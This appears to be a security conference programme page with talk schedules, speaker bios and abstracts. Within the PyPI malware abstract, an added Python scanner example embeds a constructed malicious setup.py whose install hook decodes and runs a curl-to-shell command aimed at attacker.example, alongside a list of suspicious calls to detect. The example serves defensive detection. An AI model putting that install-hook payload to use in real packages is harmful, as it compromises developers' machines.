Talks 2023

Thursday, March 23rd

09:00 Crazy incentives and how they drive security into no man's land
      by Dr. Christian Folini
10:00 COFFEE
10:30 TRACK 1: Breaking and fixing Azure AD device identity security
               by Dirk-jan Mollema
      TRACK 2: Targeted Social Engineering Attacks: Weaponizing Psychology
               by Christina Lekati
      TRACK 3: Turn and Face the Strange: Ch-Ch-Changes in Ransomware Techniques
               by Lindsay Kaye & James Niven
11:30 TRACK 1: A ticket worth waiting 65 years for
               by Charlie Bromberg
      TRACK 2: Hacking Harms! Measuring the impact and harm from cyberattacks
               by Emma Raffray
      TRACK 3: Modern Adventures with Legacy Protocols
               by Yannay Livneh
12:30 LUNCH
13:30 TRACK 1: Inglourious Drivers - The Revenge of the Peripheral Devices
               by Omer Tsarfati
      TRACK 2: Open Sésame! Example of Modern Electronic Lockpicking
               by Thomas Bygodt
      TRACK 3: Pentesting by the numbers - what data analysis tells about what we do
               by Charl van der Walt
14:30 TRACK 1: USBvalve - expose USB activity on the fly
               by Cesare Pizzi
      TRACK 2: Hacking your Jump Rope or your Coffee Machine
               by Axelle Apvrille
      TRACK 3: TBA
15:30 COFFEE
16:00 TRACK 1: How to have visibility and security OF CICD ecosystem
               by Pramod Rana
      TRACK 2: Cloud, IoT, machine learning: which models for secure ICS network architectures to adapt to new usages?
               by Alexandrine Torrents
      TRACK 3: TBA
17:00 TRACK 1: Permissionless Android Universal Overlays
               by Dimitrios Valsamaras
      TRACK 2: Attacking and Defending GraphQL: The Ultimate Guide
               by Leo Juszkiewicz
      TRACK 3: TBA

Friday, March 24th

09:00 KEYNOTE
      by TBA
10:00 COFFEE
10:30 TRACK 1: Breaking Docker's Named Pipes SYSTEMatically
               by Eviatar Gerzi
      TRACK 2: The Snake is in the Grass: Malicious PyPI Packages in the Wild
               by Christophe Tafani-Dereeper & Vladimir de Turckheim
      TRACK 3: Secrets, data and cypher-injections: Neo4j attacks and cloud exploits
               by Nitay Bachrach & Or Emanuel (Varonis)
11:30 TRACK 1: You click, you lose: a practical look at Visual Studio Code's security
               by Thomas Chauchefoin & Paul Gerste
      TRACK 2: Data Science and Machine Learning in Cybersecurity: Hype or Reality?
               by Angelo Schranko de Oliveira
      TRACK 3: Optimising Business Value with Secure Access Service Edge
               by Neil Thacker (Netskope)
12:30 LUNCH
13:30 TRACK 1: Whatever Pown2own
               by Benoit Forgette & Eloïse Brocas
      TRACK 2: Detection Engineering in Modern Day Security Organization
               by Tondang Managatas
      TRACK 3: TBA
               by Marco Preuss (Kaspersky)
14:30 TRACK 1: Cloud Disaster... As a Service
               by Chris Hernandez
      TRACK 2: Adversary Tracking And All The Lies We Tell Ourselves
               by Joe Slowik
      TRACK 3: TBA
15:30 COFFEE
16:00 TRACK 1: RCEing Your Way Into the Blockchain: Uncovering a critical vulnerability and taking over Decentralized Identity (DID) networks
               by Shaked Reiner
      TRACK 2: The History of Ransomware: From Floppies to Droppers, and Beyond
               by Eliad Kimhy
      TRACK 3: TBA
17:00 TRACK 1: Go security pitfalls: 2 lessons from the battlefield at Grafana Labs
               by Jeremy Matos
      TRACK 2: Why kidz couldn’t care less about your password advice?
               by Mia Landsem
      TRACK 3: TBA
18:15 - 04:00 Capture The Flag, Auditorium A (doors open at 17:15)


Crazy incentives and how they drive security into no man's land

Dr. Christian Folini
SPEAKER BIO

Christian Folini is a security engineer, an open source enthusiast and serial keynote speaker. He holds a PhD in medieval history and took that interest to new heights with the actual defense of castles across Europe.
But life goes on, and castles tend to be very cold, especially in winter.
So he turned to defending web servers, which he finds equally challenging. He brings 15 years of experience with ModSecurity configuration in high security environments, DDoS defense and threat modeling.

Christian Folini is the author of the second edition of the ModSecurity Handbook and the best known teacher on the subject. He co-leads the OWASP ModSecurity Core Rule Set project and serves as the program chair of the “Swiss Cyber Storm” conference. Over the years, he made a name for himself as somebody who managed to piss off the No-E-Voting as well as the Pro-E-Voting crowd, which he takes as proof of a well-balanced and typically Swiss position.

In 2023 he attempts his third InsomniHack keynote in a row with a presentation that is set to vex his supporters and put future sponsoring of his own open source project as well as the conference at risk.

Modern Adventures with Legacy Protocols

Yannay Livneh
SPEAKER BIO

Yannay is a low-level security researcher with varied interests in commodity software, networking, embedded devices and web browsers. In recent years Yannay discovered, reported and exploited vulnerabilities in popular software such as the PHP engine, VLC and the Chromium browser.
Yannay is a regular contributor to PoC||GTFO magazine and also an active CTF player and a member of 5BC team.
ABSTRACT
During 2015-2018 I found myself in a few scenarios that required IP spoofing capabilities to triumph. 30 years ago that wasn't a problem, but nowadays the moderators of the Internet (ISPs, governments, etc.) don't put up with that (except for themselves). Unfortunately, I'm neither a government nor an ISP, so I had to come up with some feasible solution for the average hacker. If you are like me, tragically devoid of nation-state capabilities, join me for this talk where I explain how you can find IP-Spoofing-As-A-Service on the internet today for free using legacy VPN protocols.

But, there is more. This talk is not your average "How I found and exploited CVE-*". No. This is not about the CVEs, not about the 0days, not about the exploits and not about the tools. Even though this talk includes all of the above, the focus of this talk is not the outcome, but the quest we call "research". I will discuss the things you won't find in a paper - the failures, the struggles, the details to make things actually work and the accidental packet of death I unleashed in the wild (I'm sorry). I will also share the horrible experience of reporting a multi-vendor vulnerability and why I will never do this again.

This presentation concludes 3 years of moonlight research. Parts of it were published before and granted me a Pwnie Award for the Most Under-hyped Research of 2022 and a couple of CVEs. But some parts were left in the shadows. Join me as I conclude the odyssey and share the full juicy details, so you too can spoof the internet at will.

Hacking Harms! Measuring the impact and harm from cyberattacks

Emma Raffray
SPEAKER BIO

As the Chief Research & Analysis Officer, Emma leads the CyberPeace Institute’s analytical activities including the delivery of data-driven platforms, strategic analysis reports and cyber investigations.

She has spent over 10 years working as an intelligence analyst across multiple sectors, including national and international law enforcement (Metropolitan Police Service, London, UK and INTERPOL), the financial sector, defense and the humanitarian sector. She is a recognized expert, providing operational and strategic analysis for intelligence units, investigations and projects.

Emma holds a BSc in Criminology and Social Policy, Loughborough University.

ABSTRACT
Over the years, efforts to measure the impact of cyberattacks have focused on the direct impact on targeted systems or organizations: the time to restore them, the financial costs and, to some extent, the number of breached records. This narrow assessment of the impact of cyberattacks misses a fundamental element: the harm the attack caused to people. The CyberPeace Institute is developing a methodology to do just this and needs your support!

Data Science and Machine Learning in Cybersecurity: Hype or Reality?

Angelo Schranko de Oliveira
SPEAKER BIO

Dr. Angelo is a Cyber Security Data Scientist Tech Lead at Mercado Libre and former Security Researcher / Software Engineer leveraging cyber security data, Statistics, and Machine Learning to hunt bad guys. The results of his work have been helping security teams to monitor, detect, identify, and prevent cyber threats. In order to achieve those results, he has been developing pipelines to extract/transform data from SIEM, APIs, and Sandboxes and applying/developing Statistical, Supervised, Unsupervised, Natural Language Processing, and Deep Learning models. He holds a PhD in Informatics, where he researched applications of Data Science and Deep Learning to malware detection. As a result, he developed Chimera, a new Android malware detection method based on Multimodal Deep Learning and Hybrid Analysis. He also holds OSCP, OSCE, and Splunk certifications.
ABSTRACT
Defensive mechanisms such as firewalls, proxies, web application firewalls, intrusion detection systems, intrusion prevention systems and so on continuously generate a huge amount of information. How can we leverage that information for threat detection and improvement of SOC operations? In this talk I'll present three real world scenarios where I've successfully applied Data Science, Supervised and Unsupervised Machine Learning, and Probabilistic Graphical Models for triaging SOC alerts, detecting API abuse, and detecting data exfiltration. By the end of this talk, the audience will be able to decide if Data Science and Machine Learning in Cybersecurity is reality, hype, both, or neither!

RCEing Your Way Into the Blockchain: Uncovering a critical vulnerability and taking over Decentralized Identity (DID) networks

Shaked Reiner
SPEAKER BIO

Shaked Reiner (@shakreiner) is a principal security researcher at CyberArk Labs focused on vulnerability research, OS security, and decentralized technologies. In his free time, Shaked likes to reverse engineer random pieces of software, solve CTF challenges and make cocktails.
ABSTRACT
The promise of Decentralized Identity (or DID) is to set us free from corporations owning our digital identity (be it Google, Apple, etc.) by distributing it to a blockchain. In this talk, we'll learn the fascinating technology behind DID and see how we were able to completely own one of the most popular DID networks currently active by uncovering a critical CVSS 10 vulnerability in it.

Inglourious Drivers - The Revenge of the Peripheral Devices

Omer Tsarfati
SPEAKER BIO

Omer Tsarfati is a Cyber Security Researcher at CyberArk Labs. He focuses on discovering new research techniques and beating complex security challenges while implementing them in the cyber security area, from the attacker's and the defender's point of view. Tsarfati's primary research areas are network defense, cloud security, Android applications and web applications, and he is a Windows internals enthusiast. Prior to CyberArk, Tsarfati served in the Israeli Army in an elite unit.
ABSTRACT
Do you like gaming and gambling?? Why not do both with your computer’s security?!
Just install a driver from your favorite peripheral vendor, and find out if it allows attackers to completely own your machine (chances are it will!).
We'll deep-dive into the 0days we discovered, exploit them, go over mitigations, and explore a very concerning and common driver behavior that you can easily avoid.

Breaking and fixing Azure AD device identity security

Dirk-jan Mollema
SPEAKER BIO

Dirk-jan Mollema is a hacker and researcher of Active Directory and Azure AD security. In 2022 he started his own company, Outsider Security, where he performs penetration tests and reviews of enterprise networks and cloud environments. He blogs at dirkjanm.io, where he publishes his research, and shares updates on the many open source security tools he has written over the years. He presented previously at TROOPERS, DEF CON, Black Hat and BlueHat and has been awarded as one of Microsoft’s Most Valuable Researchers multiple times.
ABSTRACT
In zero trust deployments, the user's endpoint is an important component. Long-term credentials that comply with strict security policies, such as Multi Factor Authentication and device compliance, are stored on the endpoint.

To secure these credentials, hardware protection with a Trusted Platform Module is used where possible. But how effective are these security controls? I have been researching Azure AD device security for the past two years and have broken quite a few of the security controls I encountered.

When a device is joined to Azure AD, several cryptographic secrets are stored in a secure part of the device’s hardware (Trusted Platform Module). These cryptographic secrets are used to prove authentication is happening from that device and the credentials were not simply extracted to elsewhere. When I first started looking at this implementation, there were several issues with it. The secrets to device authentication, although protected by a TPM, could be extracted using mimikatz by dumping the lsass process. During the following months, I researched other attack avenues that could accomplish the same without needing to dump the lsass process. In fact, I discovered it was possible to bypass the protection by the TPM in its entirety and obtain long-lived trusted access tokens without even needing Administrator privileges on the device. Meanwhile, Microsoft improved the authentication flow and changed how the TPM is used during authentication.

In this talk I walk you through all the details of the discovery of these vulnerabilities, and how they were eventually patched by Microsoft throughout 2021 and 2022.

Targeted Social Engineering Attacks: Weaponizing Psychology

Christina Lekati
SPEAKER BIO

Christina Lekati is a psychologist and a social engineer.

With her background and degree in psychology, she learned the mechanisms of behavior, motivation, and decision-making, as well as manipulation and deceit. She became particularly interested in human dynamics and passionate about social engineering.

She works with Cyber Risk GmbH as a social engineering trainer and consultant.
Christina is the leading developer of the social engineering training programs provided by Cyber Risk GmbH. She has participated in penetration tests and is running tailored training programs within companies and organizations.

Christina is also conducting vulnerability assessments on corporations and high-value targets. Those reports are based on Open Source Intelligence (OSINT). Their goal is to help organizations identify and manage risks related to human or physical vulnerabilities. These risks are the result of intelligence that is produced through publicly available resources and that threat actors regularly utilize in their attacks.

Within this realm, she is also an active executive Board Member at the OSINT Curious project, contributing to the international scene of Open Source Intelligence (OSINT) with the latest news, updates, and techniques on collection and analysis.

ABSTRACT
Cybersecurity today is not only a technical challenge.
It is also a behavioral challenge.

For years we have been reading reports warning us that people are the primary attack vector. Social engineering attacks remain at the top of the threat landscape and data breach reports. But although we tend to simplify many breaches as the result of a successful phishing attack, the reality we get from current threat research is more complex. Social engineering attacks have been evolving. Today, the pathway that leads to that successful phishing email is often the result of a larger, well-researched attack kill chain. But it doesn't stop there.

Targeted social engineering attacks that weaponize psychology have started becoming a tool employed by cybercriminals to infiltrate organizations in the public and private sectors, steal sensitive information, recruit insiders, and help threat actors breach an organization's security.

This talk provides insights into the mechanisms and the methodology of today's targeted social engineering attacks and the weaponizing of psychology. It discusses how attackers tailor their approach in order to compromise specific people in key positions, and the tricks they use to build trust and elicit information that assists them in strategizing, initiating, or delivering an attack.

This presentation will include recent, real-life case studies from current threat intelligence; it will discuss the lessons learned and the defense mechanisms we can employ to detect and deter targeted social engineering attacks.

Adversary Tracking And All The Lies We Tell Ourselves

Joe Slowik
SPEAKER BIO

Joe Slowik has over 15 years experience across multiple areas of information security and cyber operations. Currently leading Threat Intelligence and Detection Engineering at Gigamon ThreatINSIGHT, Joe has previously conducted wide-ranging threat intelligence analysis at DomainTools and ICS-focused analysis at Dragos. Additionally, Joe led the Incident Response team at Los Alamos National Laboratory, and served in multiple roles in the US Navy. Joe is dedicated to analyzing and understanding cyber intrusions and their implications, and maintains an independent training and consulting practice with Paralus LLC.
ABSTRACT
Adversary tracking and identification - if not outright attribution - is a complex and challenging task, but one that retains a fundamental flaw in its focus and execution. When tracking entities, from red teams to advanced persistent threats, defenders are almost always operating from the perspective of incident-related technical observations. While this can outline how an incident took place and through what tools, such information does not provide much (if any) insight as to who is involved and what their motivations may be. In this presentation, we will examine the identification issue, distinguishing between developers, infrastructure operators, and actual intrusion entities, while highlighting the implications of these divisions for defenders as well as those involved in the new discipline of adversary emulation. Through this discussion and examination of case studies, attendees will learn the pitfalls of identification based on technical artifacts in an increasingly commodity ecosystem, and how to combat the impacts of such a trend in their own operations.

How to have visibility and security OF CICD ecosystem

Pramod Rana
SPEAKER BIO

Pramod Rana is the author of the following open source projects:
- Omniscient - LetsMapYourNetwork: a graph-based asset management framework
- vPrioritizer - Art of Risk Prioritization: a risk prioritization framework
- sec-depend-aider - Dependabot pull request monitoring automation platform

He has presented at BlackHat, Defcon, nullcon and GrayHat before.

He is leading the application security team in Netskope with primary focus on integrating security controls in the development process and providing security-testing-as-a-service to other teams. He loves to understand new security practices and how to practically implement them.

A security professional by job, a coder by hobby, a runner by passion.

ABSTRACT
Today CICD platforms are an integral and critical part of the overall software supply chain. To support business requirements, they process a lot of sensitive data, the compromise of which can affect the entire organization. Security IN CICD is a well discussed topic; now security OF CICD deserves the same attention.

One of the challenges with security OF CICD, like in most areas of security, is the lack of visibility into what actually makes up a CICD ecosystem. Security starts with being aware of what needs to be secured.

In this talk I will be presenting how an organization can approach visibility, and thus security, OF the CICD ecosystem, along with some common attack areas like access controls, credential hygiene, misconfiguration etc. and their possible solutions.

I will introduce two new open source projects:

First, **CICDGuard** - a graph based CICD ecosystem visualizer and security analyzer, which
- Represents the entire CICD ecosystem in graph form, providing intuitive visibility and solving the awareness problem
- Identifies common security flaws across supported technologies and provides industry best practices and guidelines for identified flaws
- Technologies supported as of now:
  - GitHub
  - GitHub Action
  - Jenkins
  - Spinnaker

Second, **ActionGOAT** - a "damn vulnerable" GitHub Action, deliberately insecure for learning purposes

Cloud, IoT, machine learning: which models for secure ICS network architectures to adapt to new usages?

Alexandrine Torrents
SPEAKER BIO

Alexandrine Torrents is a cybersecurity expert at Wavestone. She started as a penetration tester and performed several cybersecurity assessments on ICS. She worked on a few ICS models to demonstrate attacks on PLCs and developed a dedicated tool to query Siemens PLCs. Then, she started working on securing ICS, especially in the scope of the French military law, helping companies offering a vital service to the nation to comply with security rules. Now, Alexandrine works with different industrial CISOs on their cybersecurity projects: defining secure architectures, hardening systems, implementing detection mechanisms. She is also IEC 62443 certified and still performs assessments on multiple environments.
ABSTRACT
More and more business needs require interconnections with ICS that seem legitimate. Yet, how do we allow these interconnections in a secure way? And can we say yes to everything?
ICS cybersecurity requirements have always been the same. And in terms of network architecture, we always come back to the Purdue Model, as well as the zones and conduits methodology. Traditionally there has been a rigidity to what a “secure” ICS architecture is. The Internet tends to be seen as the devil when we talk about ICS.
Well, “No Limits!” made me want to dream a little bit. What if I could start from scratch and build my dream architecture for ICS without any limit?
In this presentation, we compare and contrast the requirements and corresponding secure ICS network architecture of two very different businesses within the same company: power plants and solar/wind farms.

Attacking and Defending GraphQL: The Ultimate Guide

Leo Juszkiewicz
SPEAKER BIO

Leo is a security researcher with over 7 years of experience in Cyber Security, mostly focused on Web Application Security. He currently works as a Security Researcher at Palo Alto Networks, looking for web vulnerabilities in all sorts of projects in the cloud native landscape, focusing mostly on modern attacks and tactics.
ABSTRACT
Attacking and Defending GraphQL, the ultimate GraphQL guide. Leo will elaborate on the basics, history, how it works, its advantages, and why it became one of the most popular technologies for APIs in modern web applications. Subsequently, Leo will elaborate on common attack scenarios. He will dive deeper into the technicalities and share details about several common exploitation techniques and tactics, as well as showcasing real-life use cases that were exploited in the wild, bypassing security entirely and achieving full account takeover. Additionally, Leo will provide statistics and best practices for developers to create a working plan for testing, remediating and validating the security of GraphQL endpoints.

Go security pitfalls: 2 lessons from the battlefield at Grafana Labs

Jeremy Matos
SPEAKER BIO

Jeremy Matos is a Principal Security Engineer at Grafana Labs. Rather than breaking things, the former backend developer has shifted his main focus to helping produce secure enough software. He used to work at GitLab and has 15 years of experience in the software security industry. He has given talks at various security conferences, including DEF CON Crypto Village and OWASP AppSec EU.

Twitter: @SecuringApps

ABSTRACT
The Go language has proven to be very secure, yet it is not bulletproof. We will analyse in detail 2 significant vulnerabilities in Grafana that were ultimately caused by confusion around Go usage, and discuss how we gained confidence that the fixes were not missing anything.

Hacking your Jump Rope or your Coffee Machine

Axelle Apvrille
SPEAKER BIO

Axelle Apvrille is a Principal Security Researcher at Fortinet, Fortiguard Labs. Her research interests are mobile and IoT malware. In addition, she is the lead organizer of Ph0wn CTF, a competition which focuses on ethical hacking of smart objects.
In a prior life, Axelle used to implement cryptographic algorithms and security protocols.
ABSTRACT
As some may know, I love to hack IoT. Some connected objects are useful, some are close to useless but whatever category they fall in, they are always very interesting and funny to hack! In this talk, you'll learn how to hack a connected jump rope and a connected coffee machine. Actually, maybe it's better to hack coffee first and get more energy to jump ;P

The talk is very much around Bluetooth Low Energy, Android applications and how to reverse engineer.

Turn and Face the Strange: Ch-Ch-Changes in Ransomware Techniques

Lindsay Kaye & James Niven
SPEAKER BIO

Lindsay Kaye is Senior Director of Advanced Reversing, Malware, Operations and Reconnaissance (ARMOR) at Recorded Future. Her primary focus is the creation of actionable intelligence - providing endpoint, and network detections that can be used to detect threats. Lindsay’s passion is malware analysis and reverse engineering. She received a BS in Engineering with a Concentration in Computing from Olin College of Engineering and an MBA from Babson College.
James Niven is a Principal Threat Researcher at Recorded Future. Previously, James was a Red Teamer and now uses his knowledge to develop defensive approaches to detecting malicious behavior employed by threat actors.
ABSTRACT
Everyone makes mistakes - including threat actors who deploy ransomware. Sometimes, “technical innovation” on the locker goes sideways and makes it easier to track or reverse engineer, or a false flag operation doesn’t quite pin enough blame on the intended party. We will highlight some interesting examples of ransomware techniques, such as PLAY’s usage of ROP, LockBit’s acquisition of BlackMatter code, ALPHV’s Morph obfuscation tool, and the myriad of threat actors who use custom-designed crypto or hard-coded, cryptographically insecure keys, and the opportunities they presented for us as defenders to signature and detect their malicious behavior. We will present technical deep dives on these techniques and talk about evolutions in the lockers, where relevant. On a similar note, we as defenders can often focus on the novel, innovative tools and often the art of the possible while tried and true techniques remain extremely successful for threat actors. As a result, while detections centered on these novel behaviors are effective for threat hunting or tracking specific groups, defending against them is most effectively accomplished by focusing on commodity tools and TTPs used across groups. Finally, we will discuss how to stay ahead of the ever changing threat landscape, and how we anticipate threat actors will evolve, including where we expect to see them innovate next.

Open Sésame! Example of Modern Electronic Lockpicking

Thomas Bygodt
SPEAKER BIO

Thomas Bygodt is a penetration tester at Orange Cyberdefense, a CTF player and a developer.
He does not want to remain passive in front of the technologies that interact with the real world. Testing and understanding them allows us to better understand their limits, both for people's privacy and for their security. He has been specializing in connected devices for 2 years now.
ABSTRACT
In an ever increasingly connected society, we are often introduced to “new and improved” devices that offer smart capabilities, and door locks are no exception. Increased security and ease of use are some of the key selling points for these locks. However, are these modern, connected locks more secure than those from the 90s when a thief could break into your house with a little practice?

This presentation goes back to some of the origins of hacking, when hardware was as important as software is today. We will show the consequences of lax security design by hacking a connected door lock. The goal being, of course, that a homeowner would not be aware of our intrusion, all without needing any expensive equipment. From the raw electrical signal to an external proprietary BLE SDK, we will cover all aspects of the lock and confirm some vulnerabilities on another lock.

In fact, sometimes attacking your target is as simple as copying it, giving the firmware some minor tweaks, replacing some parts and voila, Open Sesame!

Cloud Disaster... As a Service

Chris Hernandez
SPEAKER BIO

Chris Hernandez (@piffd0s) is the founder of Adversary Academy LLC, a boutique cybersecurity training and pentesting firm. The former red team manager at Code42, and a former member of the Veris group adaptive threat division (Now Specterops). From an early age Chris has been interested in the low level workings of computers. When not hacking, Chris would rather be outside living as close to nature as possible.
ABSTRACT
The mix of hybrid on-prem and in-cloud environments is prevalent today. With the added operational cost of being fully migrated to the cloud, some enterprises have adopted an approach of utilizing cloud service providers for disaster recovery. Physical and virtual machines are synchronized to the cloud as a disaster recovery solution. But what if this disaster recovery solution is a disaster in its own right? Enter Microsoft Azure Site Recovery, a cloud disaster recovery as a service (DRaaS) platform, or as I like to call it, just plain "Disaster-as-a-Service".

Whatever Pown2own

Benoit Forgette & Eloïse Brocas
SPEAKER BIO

Passionate about how systems work since my childhood and with an initial education in computer science, I gradually moved to the security of these systems and the electronic part of this equipment. Today, I work as a Cybersecurity Engineer in software and hardware reverse engineering at Digital Sécurity, where my daily work consists in disassembling equipment sent by our clients, then inspecting all of its attack surfaces (hardware, radio, software, cloud). Then, we help our clients find the best way to protect their systems and their equipment.

In this work, the part that seems to me the most interesting is the automation/instrumentation/hijacking part. It is fascinating to see how much it is possible to hijack a piece of equipment from its original purpose. This is even more impressive when we talk about physical equipment which has an impact on its environment.

ABSTRACT
Pown2own is a bug bounty competition: many participants are present and only the first participant gets a reward.
It is important to be efficient in your research; search time that does not lead to exploitation is only a waste of time.
In this competition it is not necessary to be exhaustive but efficient: a vulnerability that cannot lead to code execution should not be considered.
To avoid falling into these traps we decided to target vulnerabilities with a high chance of leading to code execution, and we wanted to industrialize this research by automating it so that the search can be reproduced on any firmware.

Permissionless Android Universal Overlays

Dimitrios Valsamaras
SPEAKER BIO

Dimitrios has participated in many international and local projects, increasing his experience in mobile, web and network penetration testing. He holds a degree in Computer Science, with a major in Cryptography and Security. His prior experience in the IT industry spans from development and systems administration to IT Security services. He has a strong passion for reverse engineering and was a member of one of the first reverse engineering research groups in Greece. During the last five years, Dimitrios has been working with some of the largest companies in the industry, including Microsoft and Google, focusing on Android Ecosystem Security.
ABSTRACT
Both Android and iOS operating systems interact with users through a constrained graphical interface, typically occupied for the most part by one application at a time while many others run in the background. That being said, a user must rely on the GUI provided by the application itself to verify its legitimacy. This type of behavior has raised concerns within the security research community that have proven to be well founded, judging from the fact that multiple malware campaigns use GUI confusion as their main attack vector.

In this paper we present a novel GUI attack that leverages the fact that an Android activity maintains its graphical state and can receive touches while it is at the top of the back stack of the device home screen. Whilst most of the techniques introduced so far require the SYSTEM_ALERT_WINDOW permission, the one we present is permissionless and makes use only of the FLAG_NOT_TOUCH_MODAL flag.

By using this technique, we were able to create overlapping views over system dialogues, luring the user to unintentionally approve dangerous permissions and access to system services. Third party applications are also at risk, as it is possible to garble their UI by projecting fraudulent views that ostensibly belong to the targeted application’s context. For the latter to be successful, the PACKAGE_USAGE_STATS permission must be obtained in order to identify the application that is currently in the foreground.

Google addressed a similar issue (CVE-2020-0416) for Android versions 8.0, 8.1, 9, 10 and 11 by enabling the filterTouchesWhenObscured attribute on all SwitchPreferences, for pages that control special application permission access. Our technique (CVE-2021-39617) was not affected by this fix, and it was proven to additionally impact system dialogues that control dangerous permissions.

The Snake is in the Grass: Malicious PyPI Packages in the Wild

Christophe Tafani-Dereeper & Vladimir de Turckheim
SPEAKER BIO

Christophe lives in Switzerland and works on cloud security research and open source at Datadog. He previously worked as a software developer, penetration tester and cloud security engineer. Christophe previously spoke at industry conferences like Cloud Native SecurityCon, DEFCON Cloud Village or BlackHat Arsenal, and is the maintainer of several popular open-source projects such as Stratus Red Team, GuardDog, CloudFlair and Adaz.

Vladimir (Vlad) is a Staff engineer at Datadog. He has been working on Application Security topics since 2016 at Sqreen then at Datadog. He also is a Node.js core collaborator and has focused on Node.js runtime instrumentation. When he is not hacking, you might find him cooking or planning an upcoming raclette party.

ABSTRACT
Over the past few years, attackers have increasingly been using malicious software packages to compromise developer machines and organizations. The Python Package Index (PyPI), in particular, is frequently used to host backdoored versions of legitimate packages and information stealers. In this talk, we describe our approach and findings to identify malicious PyPI packages and present a new open-source tool, GuardDog.
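GuardDog is the tool the talk presents; the block below is an added example of the kind of source-level heuristics such a scanner applies to a package's setup.py, not GuardDog's own code or rule set. The two setup.py samples, the short list of "popular" package names used for the typosquat check, and the list of suspicious calls are all constructed for the illustration. The heuristics are: a custom setuptools command (code that runs at `pip install` time), dangerous calls such as `exec` fed by `base64.b64decode`, and a package name that is an edit or two away from a well-known one.

```python
"""Heuristic scan of a setup.py for common malicious-package patterns.
Added example, not GuardDog's code. Both inputs below are constructed; the
malicious one is parsed, never executed.
"""
import ast
import base64  # only used to build the constructed malicious sample
import difflib

# Constructed, deliberately small list for the typosquat check.
POPULAR_NAMES = ["requests", "urllib3", "colorama", "boto3", "numpy", "setuptools"]

# Constructed sample: an ordinary setup.py.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="mytool", version="1.0", packages=["mytool"])
'''

# Constructed sample: a post-install hook that decodes and executes a payload.
_PAYLOAD = base64.b64encode(b"import os; os.system('curl http://attacker.example/x | sh')").decode()
MALICIOUS_SETUP = f'''
import base64
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        exec(base64.b64decode("{_PAYLOAD}"))

setup(name="requets", version="0.0.1", cmdclass={{"install": PostInstall}})
'''

# Calls that have no business in a setup script (constructed, not exhaustive).
SUSPICIOUS_CALLS = {
    ("exec",), ("eval",),
    ("os", "system"), ("subprocess", "Popen"), ("subprocess", "run"), ("subprocess", "call"),
    ("base64", "b64decode"), ("urllib", "request", "urlopen"), ("requests", "get"),
}


def _call_name(node: ast.Call) -> tuple:
    """Flatten a call target such as base64.b64decode(...) into ('base64', 'b64decode')."""
    parts = []
    f = node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return tuple(reversed(parts))


def scan_setup_py(source: str) -> list:
    """Return a list of human-readable findings; an empty list means nothing matched."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        # Heuristic 1: a class deriving from a setuptools command runs during installation.
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                if isinstance(base, ast.Name) and base.id in ("install", "develop", "egg_info"):
                    findings.append(f"custom setuptools command '{node.name}' overrides {base.id}")
        # Heuristic 2: dangerous calls anywhere in the setup script.
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in SUSPICIOUS_CALLS:
                findings.append(f"suspicious call {'.'.join(name)} at line {node.lineno}")
        # Heuristic 3: the declared package name is a near miss of a popular package.
        elif isinstance(node, ast.keyword) and node.arg == "name" and isinstance(node.value, ast.Constant):
            pkg = str(node.value.value)
            close = difflib.get_close_matches(pkg, POPULAR_NAMES, n=1, cutoff=0.8)
            if close and close[0] != pkg:
                findings.append(f"package name '{pkg}' resembles popular package '{close[0]}'")
    return findings


if __name__ == "__main__":
    print("benign:", scan_setup_py(BENIGN_SETUP))
    print("malicious:", *scan_setup_py(MALICIOUS_SETUP), sep="\n  ")
```

The scan is static, so it sees through the installer without running it; the price is that a real scanner also has to look at the package's other modules, at the wheel's metadata and at obfuscation that does not go through `base64`, which is why tools of this kind ship many rules rather than three.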

Detection Engineering in Modern Day Security Organization

@tas_kmanager
SPEAKER BIO

Tas is currently working as a Security Researcher for Microsoft, where his main responsibility is to improve their Detection Engineering capabilities by researching novel attacks and creating detection mechanisms. Before that he worked at multiple companies, including Big 4 consulting and telecommunications firms, performing and building Threat Hunting and Detection Engineering functions.

He is a seasoned Incident Responder and Threat Hunter with a Detection Engineering mindset; he believes that after every incident there is always a new detection opportunity. He loves to be involved in the security community and has presented at numerous world-class conferences such as SANS Summits and DEF CON BTV. He is also an active contributor to The DFIR Report, where he takes part in the analysis of real attacks and provides the public with high-quality threat intelligence reports and articles. He is also a proud member of CDEF.ID, an Indonesian security community where he has presented, talked on podcasts and volunteers as a mentor.

Outside of security, he enjoys traveling with friends and family, doing astrophotography and cooking new foods from different parts of the world.

ABSTRACT
Is Detection Engineering just another overly hyped term in the world of cyber security? Is the role just a made-up one combining different elements of defensive security? Should your company stay away and not implement this fancy role in your organization?

If you are asking these questions, then this presentation is for you! In this talk, we will dive into Detection Engineering, discussing all the components and parts of this role. We will view the role from different points of view, starting from the organization's view, the individual view (aka the Detection Engineer's view) and the day-to-day view. On top of that, this presentation will be filled with real-life detection engineering lessons, gathered from the presenter's career and from other detection engineers in the industry.

After this presentation you or your organization will be able to decide whether you need a detection engineering role and, with the information provided, be able to build a successful detection engineering program and train or hire the right detection engineer.

The History of Ransomware: From Floppies to Droppers, and Beyond

Eliad Kimhy
SPEAKER BIO

Eliad is the head of Akamai Security Research CORE Team guiding the development of the Akamai Security Research work. He was one of the creators and producers of the podcast Malicious Life which tells stories from the history of cybersecurity, and has a deep passion for the untold stories of hackers. Eliad has worked with security teams for over half a decade, helping build security research organizations and publishing blogs and reports for security researchers. He has spoken at conferences such as Code.talks, IT-SA, and TBX Netherlands.
ABSTRACT
Modern ransomware has become synonymous with some of the most devastating cyber attacks of our time. But it hasn't always been so. 30 years ago, ransomware was born as a wild scheme, devised by a man armed with 10,000 floppy disks and a virus. How has this evolved into the most impactful form of cybercrime today, and what can this surprising, untold history teach us about our present and future?

USBvalve - expose USB activity on the fly

Cesare Pizzi
SPEAKER BIO

Cesare Pizzi is a Security Researcher, Analyst, and Technology Enthusiast at Sorint.lab.
He develops software and hardware and tries to share it with the community. Mainly focused on low-level programming, he has developed a lot of open-source software, sometimes hardware related (interfacing with real-world devices), sometimes not.
He does a lot of reverse engineering too. He has given presentations at several conferences:

- DEFCON 25 HHV: Ardusploit: PoC of Arduino code injection
- DEFCON 27 PHV: Sandbox creative usage
- BHUSA 2020 Arsenal - SYNwall: A Zero-Configuration (IoT) Firewall
- Insomni'hack 2022 - REW-sploit: dissect payloads with ease
